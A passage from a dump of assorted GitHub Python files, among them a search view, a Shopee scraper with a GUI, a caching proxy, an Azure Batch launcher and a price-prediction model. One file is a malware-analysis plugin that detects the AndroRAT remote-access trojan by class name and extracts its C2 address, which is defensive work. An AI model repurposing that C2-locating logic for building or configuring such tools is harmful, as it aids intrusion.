Merge k Sorted Lists.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23492226416","text":"from string import ascii_uppercase\n\nfrom elasticsearch_dsl.search import Search\nfrom elasticsearch.exceptions import ConnectionError, RequestError\nfrom elasticsearch_dsl import query as dsl_query\n\nfrom cwtags import tag as T\n\nfrom logilab.common.decorators import cachedproperty\n\nfrom cubicweb import _\nfrom cubicweb.rset import ResultSet\n\nfrom cubicweb_elasticsearch.views import ElasticSearchView\n\nfrom cubicweb_francearchives.views import get_template, rebuild_url, format_number\n\nfrom . import PaginationMixin, FakeResponse\n\n\nLETTERS_TO_LABEL = {\"#\": _(\"others alphabets\"), \"0\": _(\"0-9\"), \"!\": _(\"punctuation\")}\n\n\nclass PniaAuthoritiesElasticSearchView(PaginationMixin, ElasticSearchView):\n __abstract__ = True\n title_count_templates = (_(\"No result\"), _(\"1 result\"), _(\"{count} results\"))\n template = get_template(\"searchlist.jinja2\")\n cw_etype = \"SubjectAuthority\"\n items_per_page_options = [100, 200]\n default_items_per_page = 100\n\n @property\n def breadcrumbs(self):\n breadcrumbs = [(self._cw.build_url(\"\"), self._cw._(\"Home\"))]\n breadcrumbs.append((None, self._cw._(self.title)))\n return breadcrumbs\n\n def add_css(self):\n self._cw.add_css(\"css/font-awesome.css\")\n\n def add_js(self):\n self._cw.add_js(\"cubes.pnia_search.js\")\n\n @cachedproperty\n def xiti_chapters(self):\n return [\"Authorities\", self.__regid__]\n\n # XXX This page does not have a query string, to modify or remove\n @cachedproperty\n def cached_search_response(self):\n query_string = self._cw.form.get(\"q\")\n if hasattr(self, \"_esresponse\"):\n return self._esresponse, query_string\n try:\n self._esresponse = self.do_search(query_string)\n except Exception as err:\n self.exception(err)\n self._esresponse = FakeResponse()\n\n return self._esresponse, query_string\n\n def build_results(self, response):\n rset = self.rset_from_response(response)\n if not rset:\n return []\n results = []\n for entity, item_response in zip(rset.entities(), response):\n try:\n entity.complete()\n except Exception:\n self.exception(\n \"failed to build entity with eid %s (ES says etype is %s)\",\n entity.eid,\n getattr(item_response, \"cw_etype\", \"?\"),\n )\n continue\n results.append(entity.view(\"pniasearch-item\", es_response=item_response))\n return results\n\n def format_results_title(self, response):\n count = response.hits.total.value if response is not None else 0\n if count == 0:\n tmpl = self.title_count_templates[0]\n elif count == 1:\n tmpl = self.title_count_templates[1]\n else:\n tmpl = self.title_count_templates[2]\n return self._cw._(tmpl).format(count=format_number(count, self._cw))\n\n def customize_search(self, query_string, facet_selections, start=0, stop=10, **kwargs):\n \"\"\"\n This is where one can customize the search by modifying the\n query string and facet selection in an inherited class.\n\n \"\"\"\n stop = stop if stop != 10 else self.default_items_per_page\n cwconfig = self._cw.vreg.config\n index_name = f\"{cwconfig['index-name']}_suggest\"\n search = Search(doc_type=\"_doc\", index=index_name).sort(\"text.raw\")\n must = [\n {\"match\": {\"cw_etype\": self.cw_etype}},\n {\"match\": {\"quality\": True}},\n {\"range\": {\"count\": {\"gte\": 1}}},\n ]\n fulltext_string = self._cw.form.get(\"fulltext_facet\", \"\").strip()\n if fulltext_string:\n must.append(\n 
dsl_query.SimpleQueryString(\n                    \"simple_query_string\",\n                    query=fulltext_string,\n                    fields=[\"text\"],\n                    default_operator=\"and\",\n                )\n            )\n        letter = self._cw.form.get(\"let\")\n        if letter:\n            must.append({\"match\": {\"letter\": letter}})\n        search.query = dsl_query.Bool(must=must)\n        return search[start:stop]\n\n    def rset_from_response(self, response):\n        \"\"\"transform an ES response into a CubicWeb rset\n\n        This consists of iterating over the current paginated response and\n        inspecting the ``cw_etype`` and ``eid`` document fields.\n\n        NOTE: some etypes used for the ES indexation are not part of the\n        actual CubicWeb schema and therefore require to be mapped on a\n        valid entity type (e.g. ExternRef's reftypes)\n\n        others, e.g. Card, are not indexed with their own etypes\n        \"\"\"\n\n        def get_etype_from_result(result):\n            return getattr(result, \"cw_etype\", self.cw_etype)\n\n        req = self._cw\n        descr, rows = [], []\n        for idx, result in enumerate(response):\n            # safety belt, in v0.6.0, PDF are indexed without a cw_etype field\n            cw_etype = get_etype_from_result(result)\n            # safety belt for import-ead with esonly=True: in that case,\n            # ES documents don't have eids\n            if not result.eid:\n                # must not happen\n                continue\n            else:\n                eid = result.eid\n            descr.append((cw_etype, \"String\"))\n            rows.append([eid, \"foo\"])\n        rset = ResultSet(rows, \"Any X\", description=descr)\n        rset.req = req\n        return rset\n\n    def search_summary(self):\n        summary = []\n        _ = self._cw._\n        active_letter = self._cw.form.get(\"let\", \"\").strip()\n        if active_letter:\n            reset_url = rebuild_url(self._cw, **{\"let\": None})\n            value = LETTERS_TO_LABEL.get(active_letter, \"\")\n            if not value:\n                value = f'\"{active_letter.upper()}\"'\n            summary.append({\"name\": _(\"Starts with\"), \"value\": [(value, reset_url)]})\n        key = \"fulltext_facet\"\n        value = self._cw.form.get(key, \"\").strip()\n        if value:\n            reset_url = rebuild_url(self._cw, **{key: None})\n            summary.append({\"name\": _(\"Contains\"), \"value\": [(value, reset_url)]})\n        return {\"summary\": summary}\n\n    def get_header_attrs(self):\n        return {\"title\": self._cw._(self.title)}\n\n    def letters(self, entity=None):\n        data = {}\n        active_letter = self._cw.form.get(\"let\", \"\")\n        data[\"all\"] = [\n            (self._cw._(\"all\"), self._cw.build_url(), \"all active\" if not active_letter else \"all\")\n        ]\n        letters = []\n        for letter in ascii_uppercase:\n            lower = letter.lower()\n            letters.append(\n                (\n                    letter,\n                    self._cw.build_url(let=lower),\n                    \"letter active\" if lower == active_letter else \"letter\",\n                )\n            )\n        # 0-9\n        data[\"letters\"] = letters\n        return data\n\n    def reset_all_facets_link(self):\n        \"\"\"Creates a URL which resets the values from the facets to display\n\n        The value of the initial query (parameter q) is kept\n        as well as values which come from other SearchView\n        \"\"\"\n        url_params = {}\n        facets = self.facets_to_display\n        for facet in facets:\n            url_params[\"es_{}\".format(facet[0])] = None\n        for key in (\"fulltext_facet\", \"es_date_min\", \"es_date_max\", \"let\"):\n            url_params[key] = None\n        return rebuild_url(self._cw, **url_params)\n\n    def call(self, context=None, **kwargs):\n        self.add_js()\n        self.add_css()\n        try:\n            response, query_string = self.cached_search_response\n        except ConnectionError:\n            self.w(\n                T.div(\n                    self._cw._(\"failed to connect to elasticsearch\"),\n                    Class=\"alert alert-info\",\n                    role=\"alert\",\n                )\n            )\n            return\n        except RequestError:\n            self.exception(\"ES search failed\")\n            self.w(\n                T.div(\n                    self._cw._(\"there was a problem with the elasticsearch request\"),\n                    
Class=\"alert alert-info\",\n role=\"alert\",\n )\n )\n return\n except KeyError:\n self.exception(f\"Key error on {self.__class__} do_search\")\n response = FakeResponse()\n # FIXME fulltext don't work\n fulltext_params = self._cw.form.copy()\n fulltext_value = fulltext_params.pop(\"fulltext_facet\", \"\")\n fulltext_params.pop(\"page\", None)\n for key, value in fulltext_params.items():\n if not isinstance(value, (tuple, list)):\n fulltext_params[key] = [value]\n\n first_previous_pages, next_last_pages = self.pagination(response.hits.total.value)\n self.w(\n self.template.render(\n req=self._cw,\n _=self._cw._,\n response=response,\n display_facets=True,\n results_title=self.format_results_title(response),\n display_fulltext_facet=True,\n fulltext_form_action=self._cw.build_url(\n self._cw.relative_path(includeparams=False)\n ),\n fulltext_params=fulltext_params,\n fulltext_value=fulltext_value,\n search_results=self.build_results(response),\n search_summary=self.search_summary(),\n reset_all_facets_link=self.reset_all_facets_link(),\n first_previous_pages=first_previous_pages,\n next_last_pages=next_last_pages,\n header=self.get_header_attrs(),\n letters=self.letters(),\n items_per_page_links=self.items_per_page_links(),\n display_sort_options=False,\n page_number_params=self.page_number_params(),\n page_number_form_action=self._cw.build_url(\n self._cw.relative_path(includeparams=False)\n ),\n current_page=int(self._cw.form.get(\"page\", 1)),\n number_of_pages=self.number_of_pages(response.hits.total.value),\n )\n )\n\n\nclass PniaSubjectAuthoriesElasticSearchView(PniaAuthoritiesElasticSearchView):\n __regid__ = \"subjects\"\n cw_etype = \"SubjectAuthority\"\n title = _(\"Themes\")\n title_count_templates = (_(\"No themes\"), _(\"1 theme\"), _(\"{count} themes\"))\n\n\nclass PniaAgentAuthoriesElasticSearchView(PniaAuthoritiesElasticSearchView):\n __regid__ = \"agents\"\n cw_etype = \"AgentAuthority\"\n title = _(\"Persons/organizations\")\n title_count_templates = (\n _(\"No persons/organizations\"),\n _(\"1 person/organization\"),\n _(\"{count} persons/organizations\"),\n )\n\n\nclass PniaLocationAuthoriesElasticSearchView(PniaAuthoritiesElasticSearchView):\n __regid__ = \"locations\"\n cw_etype = \"LocationAuthority\"\n title = _(\"Locations\")\n title_count_templates = (_(\"No locations\"), _(\"1 location\"), _(\"{count} locations\"))\n","repo_name":"culturecommunication/francearchives-cubicweb","sub_path":"cubicweb_francearchives/views/search/authorities.py","file_name":"authorities.py","file_ext":"py","file_size_in_byte":11064,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"34462796924","text":"from sys import argv\n\n\ndef _is_leap_year(year: int) -> bool:\n if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\n return True\n return False\n\n\ndef check_date(date: str) -> bool:\n long_month = (1, 3, 7, 8, 10, 12)\n day, month, year = map(int, date.split('.'))\n if year < 0 or year > 9999:\n return False\n if month < 1 or month > 12:\n return False\n if day < 1 or day > 31:\n return False\n if month not in long_month and day > 30:\n return False\n if month == 2:\n if _is_leap_year(year):\n if day > 29:\n return False\n else:\n if day > 28:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n if len(argv) > 1:\n if not check_date(argv[1]):\n print(f\"Некорректная дата {argv[1]}\")\n 
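# a non-zero exit status lets shell callers detect the invalid date\n            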
exit(-1)\n","repo_name":"DmitriyKardava/gb_deep_python","sub_path":"lesson6/datecheck/datecheck.py","file_name":"datecheck.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31623528828","text":"# @Time : 2022-08-10 21:33\n# @Author : Phalange\n# @File : 2169. 得到 0 的操作数.py\n# @Software: PyCharm\n# C'est la vie,enjoy it! :D\n\n\nclass Solution:\n def countOperations(self, num1: int, num2: int) -> int:\n ops = 0\n while num1 != 0 and num2 != 0:\n if num1 >= num2:\n num1 -=num2\n else:\n num2 -=num1\n ops +=1\n\n return ops","repo_name":"enternityFan/LeetCodePythonVersion","sub_path":"模拟/2169. 得到 0 的操作数.py","file_name":"2169. 得到 0 的操作数.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40077577529","text":"# -*- coding: UTF-8 -*-\nfrom numpy import not_equal, ushort\nimport requests\nfrom requests import status_codes\nimport pandas as pd\nimport emoji\nfrom datetime import datetime\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import QBrush, QImage, QPixmap, QColor, QDesktopServices\nfrom PyQt5.QtCore import QUrl\n\n\nfrom . import ShopeeSearch\nfrom GUI import GUI_Shop\nfrom GUI import GUI_Comment\nimport Function\n\n\nclass Shopee:\n def search(self, keyword):\n data = ShopeeSearch.search_keyword(keyword)\n if data != None:\n attributes={'shopid':'賣家ID','shopacc':'賣家帳號','shopname':'賣家名稱', 'itemid':'商品ID', 'name':'商品名稱', 'shop_location':'賣場位置', 'ctime':'上架時間', 'historical_sold':'已售出數量', 'stock':'庫存', 'liked_count':'喜歡數', 'view_count':'瀏覽數', 'price':'實際價格','url':'網址'}\n df = self.data_to_dataframe( data, attributes)\n return df\n else:\n return None\n\n\n def data_to_dataframe( self, data, attributes):\n dict_ = {}\n attributes_key = list(attributes.keys())\n for i in range( 0, len(data), 1):\n item = data[i]\n if '三多' in item['name']:\n for j in range( 0, len(attributes_key), 1):\n key = attributes_key[j]\n key_name = attributes[key]\n if 'shopacc' in key or 'shopname' in key:\n shopid = item['shopid']\n itemid = item['itemid']\n item_name = item['name']\n shop_account, shop_name = ShopeeSearch.search_shopaccount( shopid, itemid, item_name)\n\n if key == 'name':\n str_ = item[key]\n value = emoji.get_emoji_regexp().sub(u'', str_)\n elif key == 'shopacc':\n value = shop_account\n elif key == 'shopname':\n value = shop_name\n elif key == 'ctime':\n date_time = datetime.fromtimestamp(item[key])\n value = date_time.strftime(\"%m/%d/%Y\")\n elif key == 'price_before_discount' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'price' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'price_min_before_discount' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'price_max_before_discount' and item[key] > 0:\n value = int(item[key]/100000)\n elif key == 'url':\n value = 'https://shopee.tw/product/'+str(item['shopid'])+'/'+str(item['itemid'])\n else:\n value = item[key]\n \n if key_name not in dict_:\n dict_[key_name] = []\n dict_[key_name].append(value)\n\n # Create DataFrame\n df = pd.DataFrame(dict_)\n\n\n return df \n\n\n def data_to_dataframe_comment( self, data, attributes):\n # check max image num\n max_imgnum = 0\n for i in range( 0, len(data), 1):\n if data[i]['images'] != None:\n num = len(data[i]['images'])\n max_imgnum = max( num, max_imgnum)\n for i in range( 0, max_imgnum, 1):\n attributes['image'+str(i)] = 
'圖片'+str(i)\n dict_ = {}\n attributes_key = list(attributes.keys())\n for i in range( 0, len(data), 1):\n item = data[i]\n for j in range( 0, len(attributes_key), 1):\n if data[i]['images'] == None:\n continue\n key = attributes_key[j]\n key_name = attributes[key]\n if key == 'ctime':\n date_time = datetime.fromtimestamp(item[key])\n value = date_time.strftime(\"%m/%d/%Y\")\n elif 'image' in key:\n img_range = len(item['images'])\n img_index = int(key.replace('image',''))\n if img_index >= img_range:\n value = ''\n else:\n value = item['images'][img_index]\n else:\n value = item[key]\n\n if key_name not in dict_:\n dict_[key_name] = []\n dict_[key_name].append(value)\n\n # Create DataFrame\n df = pd.DataFrame(dict_)\n\n return df\n\n\n def data_to_csv( self, csvname, df):\n csvname = Function.check_csvname(csvname)\n df.to_csv('./蝦皮/'+csvname+'.csv', encoding='utf-8-sig', index=False)\n\n\n def show_table( self, gui, df):\n keys = list(df)\n table = gui.tableWidget\n table.setColumnCount(len(keys))\n table.setRowCount(len(df[keys[0]])+1)\n table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n table.setHorizontalHeaderLabels(keys)\n\n df_array = df.values\n for i in range( 0, df.shape[0], 1):\n for j in range( 0, df.shape[1], 1):\n item = QTableWidgetItem(str(df_array[i,j]))\n if keys[j] == '賣家ID' or keys[j] == '商品ID':\n item.setForeground(QBrush(QColor(0,0,255)))\n \n table.setItem( i, j, item)\n\n \n def show_detail( self, gui, index, df):\n keys = list(df)\n column = index.column()\n row = index.row()\n shopid = str(df['賣家ID'][row])\n shopname = str(df['賣家名稱'][row])\n itemid = str(df['商品ID'][row])\n itemname = str(df['商品名稱'][row])\n\n if keys[column] == '賣家ID':\n self.show_shop( gui, shopid, shopname)\n\n elif keys[column] == '商品ID':\n self.show_comment( gui, shopid, shopname, itemid, itemname)\n\n \n def show_shop( self, gui, shopid, shopname):\n data = ShopeeSearch.search_shop(shopid)\n attributes = {'itemid':'商品ID', 'name':'商品名稱', 'shop_location':'賣場位置', 'ctime':'上架時間', 'historical_sold':'已售出數量', 'stock':'庫存', 'liked_count':'喜歡數', 'view_count':'瀏覽數', 'price':'實際價格'}\n df = self.data_to_dataframe( data, attributes)\n \n if df.empty:\n QMessageBox.information(None, '訊息', '此店家過多商品!(功能尚在開發中)')\n else:\n keys = list(df)\n self.data_to_csv( '蝦皮'+'_'+shopname, df)\n\n gui.shop_window = ShopWindow()\n gui.shop_window.show()\n gui.shop_window.label.setText(shopname)\n \n gui.shop_window.tableWidget.setColumnCount(len(keys))\n gui.shop_window.tableWidget.setRowCount(len(df[keys[0]])+1)\n\n gui.shop_window.tableWidget.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)\n gui.shop_window.tableWidget.setHorizontalHeaderLabels(keys)\n\n df_array = df.values\n for i in range( 0, df.shape[0], 1):\n for j in range( 0, df.shape[1], 1):\n item = QTableWidgetItem(str(df_array[i,j]))\n if keys[j] == '商品ID':\n item.setForeground(QBrush(QColor(0,0,255)))\n gui.shop_window.tableWidget.setItem( i, j, item)\n\n gui.shop_window.tableWidget.doubleClicked.connect(lambda:gui.shop_window.index( df, shopid, shopname))\n\n\n def show_comment( self, gui, shopid, shopname, itemid, itemname):\n data = ShopeeSearch.search_comment( shopid, itemid, itemname)\n if data == None:\n QMessageBox.information(None, '訊息', '此商品尚無任何評論!')\n else:\n attributes = {'userid':'買家ID','author_username':'買家名稱','author_shopid':'買家賣場','ctime':'評論時間','rating_star':'評分','comment':'評論'}\n df = self.data_to_dataframe_comment( data, attributes)\n if df.empty:\n QMessageBox.information(None, '訊息', 
'此商品尚無任何圖片評論!')\n            else:\n                keys = list(df)\n                self.data_to_csv( shopname+'_'+itemname, df)\n\n                gui.comment_window = CommentWindow()\n                gui.comment_window.show()\n                gui.comment_window.label_shopid.setText(shopname)\n                gui.comment_window.label_itemname.setText(itemname)\n\n                gui.comment_window.tableWidget.setColumnCount(len(keys))\n                gui.comment_window.tableWidget.setRowCount(len(df[keys[0]])+1)\n                gui.comment_window.tableWidget.setHorizontalHeaderLabels(keys)\n\n\n                gui.comment_window.tableWidget.setColumnWidth(0,130)\n                gui.comment_window.tableWidget.setColumnWidth(1,120)\n                gui.comment_window.tableWidget.setColumnWidth(2,130)\n                gui.comment_window.tableWidget.setColumnWidth(3,130)\n                gui.comment_window.tableWidget.setColumnWidth(4,50)\n                gui.comment_window.tableWidget.setColumnWidth(5,600)\n                for i in range( 6, len(keys), 1):\n                    gui.comment_window.tableWidget.setColumnWidth(i,400)\n                \n                df_key = list(df)\n                df_array = df.values\n                for i in range( 0, df.shape[0], 1):\n                    gui.comment_window.tableWidget.setRowHeight(i, 400)\n                    for j in range( 0, df.shape[1], 1):\n                        key_ = df_key[j]\n                        if '圖片' in key_ and df_array[i,j] != '':\n                            img_url = 'https://cf.shopee.tw/file/'+df_array[i,j]\n                            request = requests.get( img_url, stream=True)\n                            assert request.status_code == 200\n                            img_o = QImage()\n                            assert img_o.loadFromData(request.content)\n                            img_p = QPixmap.fromImage(img_o)\n                            img_p = img_p.scaled(350,350)\n                            w = QLabel()\n                            w.setPixmap(img_p)\n\n                            gui.comment_window.tableWidget.setCellWidget( i, j, w)\n                        else:\n                            gui.comment_window.tableWidget.setItem( i, j, QTableWidgetItem(str(df_array[i,j])))\n                \n                gui.comment_window.tableWidget.doubleClicked.connect(lambda:gui.comment_window.index(df))\n        \n\n\n    def url_search( self, url):\n        shopid, itemid, itemname = self.url_parser(url)\n        shopaccount, shopname = ShopeeSearch.search_shopaccount(shopid, itemid, itemname)\n        self.show_shop( self, shopid, shopname)\n\n    def url_parser( self, url):\n        # remove query\n        url = url.split('?')[0]\n        # remove domain\n        url = url.replace('https://shopee.tw/','')\n        # split url\n        itemname, url = url.split('-i.')\n        shopid,itemid = url.split('.')\n\n        return shopid, itemid, itemname\n\n\nclass ShopWindow( QMainWindow, GUI_Shop.Ui_MainWindow):\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n\n    def index( self, df, shopid, shopname):\n        #selected cell index\n        index = self.tableWidget.selectionModel().currentIndex()\n        column = index.column()\n        row = index.row()\n\n        itemid = str(df['商品ID'][row])\n        itemname = str(df['商品名稱'][row])\n        self.shopee = Shopee()\n        self.shopee.show_comment( self, shopid, shopname, itemid, itemname)\n\n\nclass CommentWindow( QMainWindow, GUI_Comment.Ui_MainWindow):\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n\n    def index( self, df): \n        #selected cell index\n        index = self.tableWidget.selectionModel().currentIndex()\n        column = index.column()\n        row = index.row()\n        df_array = df.values\n        img_url = QUrl('https://cf.shopee.tw/file/'+df_array[row,column])\n        QDesktopServices.openUrl(img_url)\n\n","repo_name":"andyabc0618/ECCrawler","sub_path":"Shopee/Shopee.py","file_name":"Shopee.py","file_ext":"py","file_size_in_byte":12282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42762426176","text":"import json\nfrom . 
import APKPlugin\n\n\nclass AndroRAT(APKPlugin):\n name = \"androrat\"\n extraction = \"AndroRAT Configuration\"\n probable_name = \"AndroRAT\"\n\n def run(self, module):\n for cls in self.vm_analysis.get_classes():\n cls = cls.get_vm_class()\n if 'Lmy/app/client/ProcessCommand;'.lower() in cls.get_name().lower():\n self.process_class = cls\n break\n else:\n return None\n\n c2Found = False\n portFound = False\n c2 = \"\"\n port = \"\"\n string = None\n for method in self.process_class.get_methods():\n if method.name == 'loadPreferences':\n for inst in method.get_instructions():\n if inst.get_name() == 'const-string':\n string = inst.get_output().split(',')[-1].strip(\" '\")\n if c2Found:\n c2 = string\n c2Found = False\n if string == 'ip':\n c2Found = True\n if string == 'port':\n portFound = True\n if inst.get_name() == 'const/16':\n if portFound:\n string = inst.get_output().split(',')[-1].strip(\" '\")\n port = string\n if c2 and port:\n break\n\n server = \"\"\n if port:\n server = \"{0}:{1}\".format(c2, str(port))\n else:\n server = c2\n\n module.add_ioc(server, ['androdat', 'c2'])\n\n return json.dumps({'c2': server}, indent=2)\n","repo_name":"certsocietegenerale/fame_modules","sub_path":"processing/apk/apk_plugins/androrat.py","file_name":"androrat.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"71"} +{"seq_id":"23487933363","text":"import socket\nimport threading\n\nimport colorama\nfrom colorama import Fore\n\nfrom lib.client import Client\n\n\nclass Server:\n\n def __init__(self, port, cache):\n self._cache = cache\n self._port = port\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind(('0.0.0.0', port))\n self.socket.listen(1)\n\n def start(self):\n colorama.init()\n print(f\"{Fore.CYAN}[*] Started Caching Proxy on port {self._port}\")\n\n while True:\n client_socket, client_address = self.socket.accept()\n client = Client(client_socket, self._cache)\n thread = threading.Thread(target=client.handle_connection)\n thread.start()\n","repo_name":"RobinvandenHurk/cache-proxy","sub_path":"lib/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"} +{"seq_id":"42517751942","text":"import tkinter as tk\nimport os \nimport math\nimport warsawFunc as funct\n\nuser=\"Paige\"\n\nroot = tk.Tk()\nroot.geometry('800x800')\nroot.title(\"Warsaw Wireless\")\nroot['bg']='orange'\n\nframe0 = tk.Frame(root, height=100, width=800, bg=\"orange\", padx=5, pady=5)\nframe0.place(x=0, y=0)\n\nframe1 = tk.Frame(root, height=700, width=800, bg=\"black\", padx=5, pady=5)\nframe1.place(x=0, y=101)\n\n\nlabel0 = tk.Label(text=f\"Hello, {user}\", bg=\"orange\")\nlabel0.place(x=400,y=10)\n\naddSale = tk.Button(root, text=\"Add Sale\", width=15)\naddSale.place(x=200, y=720)\n\nroot.mainloop()","repo_name":"willalley1/PythonWarsawApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"24602171528","text":"\"\"\"\nextract.py is the main file which will be invoked from ADF custom batch activity for extraction process.\n\"\"\"\nfrom os import path\n\n\nimport datetime\nimport argparse\nimport logging\n\nfrom core.extract.extractscheduler import ExtractScheduler\nfrom 
core.batch.task import Task\nfrom core.batch.job import Job\nfrom core.config import getSettings\nfrom utils.confighelper import ConfigHelper\n\nif __name__ == '__main__':\n\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--inputFile\", \"-i\", help=\"Set the raw path\")\n parser.add_argument(\n \"--outputPath\", \"-o\", help=\"Set the output path\"\n )\n \n args = parser.parse_args()\n\n\n settings = getSettings()\n configHelper=ConfigHelper()\n log = logging.getLogger(__name__)\n task = Task()\n job = Job()\n configHelper = ConfigHelper()\n \n log.info(f\"Environment : {settings.RUN_ENVIRONMENT}\")\n\n start_time = datetime.datetime.now().replace(microsecond=0)\n log.info(f\"Extraction start time: {start_time}\")\n \n #Extract the given bag file\n extractionScheduler = ExtractScheduler(job=job, task=task)\n jobs = extractionScheduler.scheduleExtraction(\n inputFile=args.inputFile,\n outputPath=args.outputPath, \n poolId=settings.AZ_BATCH_EXECUTION_POOL_ID\n )\n\n # Execution will wait for 10 minutes to monitor task execution before terminating gracefully.\n # You can configure it based on your ideal processing time.\n job.monitorJobsToComplete(\n jobs=jobs, timeout=datetime.timedelta(minutes=10)\n )\n\n end_time = datetime.datetime.now().replace(microsecond=0)\n\n log.info(f\"Extraction completion time: {end_time}\")\n elapsed_time = end_time - start_time\n log.info(f\"Elapsed time: {elapsed_time}\")\n\n except Exception as e:\n raise RuntimeError(f\"Error: {e.__class__}\")\n\n","repo_name":"Azure-Samples/modern-data-warehouse-dataops","sub_path":"single_tech_samples/datafactory/sample3_data_pre_processing_with_azure_batch/src/orchestrator-app/app/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":512,"dataset":"github-code","pt":"71"} +{"seq_id":"70694354149","text":"\nfrom siharpa.actions.jaringan.DataPreprocessing import DataPreprocessing\nfrom siharpa.actions.jaringan.Backpropagation import Backpropagation\nfrom datetime import date,timedelta,datetime\nimport pandas as pd\nimport re\nimport io\n\nclass PrediksiImport:\n def __init__(self,arrOfExcel,harga_pangan,hari_prediksi,excel,neuron_input,neuron_hidden,epoh,learn_rate,hidden_layer,normalisasi):\n # print(hari_prediksi)\n # print(excel)\n hari_diprediksi = int(hari_prediksi) # inisialisasi banyak hari diprediksi\n # print('df')\n \n # data = pd.read_excel(excel) #(use \"r\" before the path string to address special character, such as '\\'). 
Don't forget to put the file name at the end of the path + '.xlsx'\n # df = pd.DataFrame(data)\n # print(df)\n # arrOfExcel = df.values.tolist()\n\n # # data = io.BytesIO(excel.read())\n # # df = pd.read_excel(data,sheet_name='Laporan Harian')\n # # arrOfExcel = df.values.tolist()\n\n # print(arrOfExcel)\n\n # raw_harga_pangan = arrOfExcel[-1][2:]\n\n # if(len(raw_harga_pangan) < 6):\n # raise Exception(\"Data histori terlalu sedikit\")\n \n # print('raw harga pangan ',raw_harga_pangan)\n\n # harga_pangan=[]\n\n # for harga in raw_harga_pangan:\n # print(harga)\n # x = re.findall(\"\\d+\", str(harga))\n # x=''.join(x)\n # harga_pangan.append(int(x))\n \n # print('harga pangan',harga_pangan)\n \n #self.tanggalPangan = self.data.tanggalPangan[int(neuron_input):]\n \n #banyaknya jumlah data input\n data_input = neuron_input\n\n #inisialisasi pembentukan pola data\n pangan = DataPreprocessing(harga_pangan,data_input,normalisasi)\n #normalisasi dengan metode maks-min,desimal,z-score,sigmoid-biner,sigmoid-bipolar, atau tanh\n pangan.normalisasi() #'maks-min','desimal','z-score-biner','z-score-bipolar','z-score-tanh'\n #proses membuat pola dataset\n pangan.polaData();\n #proses pola data agar mendapat pola uji dan latih yang terpisah, dan pola input dan target yang terpisah\n pangan.splitPolaData()\n print(len(pangan.data_normalisasi))\n #Memasuki Model Jaringan Syaraf Tiruan\n \n jst = Backpropagation(epoh,learn_rate,neuron_input,hidden_layer,neuron_hidden,0,pangan,normalisasi)\n\n jst.inisialisasiBobot()\n jst.pelatihan()\n print(hari_diprediksi)\n jst.prediksi(hari_diprediksi)\n jst.data.transformNormalisasi()\n \n #Buat Array Harga Pangan\n self.hargaPangan = []\n self.tanggalPangan=[]\n self.hargaPangan.extend(jst.data.transform_target_latih.tolist())\n #self.hargaPangan.extend(harga_pangan[-hari_diprediksi:])\n print(arrOfExcel[0][2+int(neuron_input):])\n \n try:\n for tanggal in arrOfExcel[-3][2+int(neuron_input):]:\n print('old tanggal')\n print(tanggal)\n new_tanggal = re.sub('/+','-',tanggal)\n print(new_tanggal)\n self.tanggalPangan.append(new_tanggal)\n except :\n for tanggal in arrOfExcel[-2][2+int(neuron_input):]:\n print('old tanggal')\n print(tanggal)\n new_tanggal = re.sub('/+','-',tanggal)\n print(new_tanggal)\n self.tanggalPangan.append(new_tanggal)\n \n today = datetime.strptime(self.tanggalPangan[-1],'%d-%m-%Y')\n for index_hari_diprediksi in range(hari_diprediksi):\n #self.tanggalPangan.append(date(today.year,today.month,today.day+index_hari_diprediksi+1).strftime('%d/%m/%Y'))\n self.tanggalPangan.append((today+timedelta(days=index_hari_diprediksi+1)).strftime('%d-%m-%Y'))\n \n print('tanggal pangan',self.tanggalPangan)\n print(jst.data.transform_output_latih.tolist())\n print(jst.data.transform_prediksi.tolist())\n \n #Buat Array Prediksi\n self.hargaPrediksi = []\n self.hargaPrediksi.extend(jst.data.transform_output_latih.tolist())\n self.hargaPrediksi.extend(jst.data.transform_prediksi.tolist())\n self.akurasi = 100 - jst.meanAbsolutePrecentageError(self.hargaPangan,self.hargaPrediksi)\n","repo_name":"AxlAdilla/siharpa","sub_path":"siharpa/actions/PrediksiImport.py","file_name":"PrediksiImport.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15739105730","text":"\"\"\"This file emulates a constant stream of requests.\"\"\"\n\nimport json\nimport os\nimport random\nimport time\nfrom typing import Optional\n\nfrom locust import HttpUser, constant, task\n\nPROMPTS = [\n 
